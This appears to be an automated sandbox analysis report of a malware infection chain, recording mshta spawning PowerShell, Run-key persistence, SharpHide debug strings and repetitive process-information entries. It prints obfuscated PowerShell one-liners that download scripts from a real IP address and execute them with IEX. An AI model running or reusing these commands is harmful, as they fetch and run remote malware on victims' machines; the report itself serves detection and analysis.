Source:	Binary string: System.Management.Automation.pdb?{ source: powershell.exe, 00000007.00000002.2400988982.0000022DFF04E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \SharpHide-master\SharpHide\obj\Debug\SharpHide.pdb source: powershell.exe, 00000005.00000002.2129677364.0000024B803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B804A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2123644838.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb` source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb5 source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0EE000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF8488EB4EC push ebx; retf	5_2_00007FF8488EB4ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF8488EC89C pushad ; iretd	5_2_00007FF8488EC89D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8488DB4EC push ebx; retf	7_2_00007FF8488DB4ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8488DC89C pushad ; iretd	7_2_00007FF8488DC89D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8488D10E8 push E85DD6FBh; ret	7_2_00007FF8488D10F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF84890B4EC push ebx; retf	8_2_00007FF84890B4ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF84890C89C pushad ; iretd	8_2_00007FF84890C89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00441860 push eax; mov dword ptr [esp], 424D4C7Fh	13_2_00441864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0043A6F5 push esi; retf	13_2_0043A6FE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NULL			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NULL			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
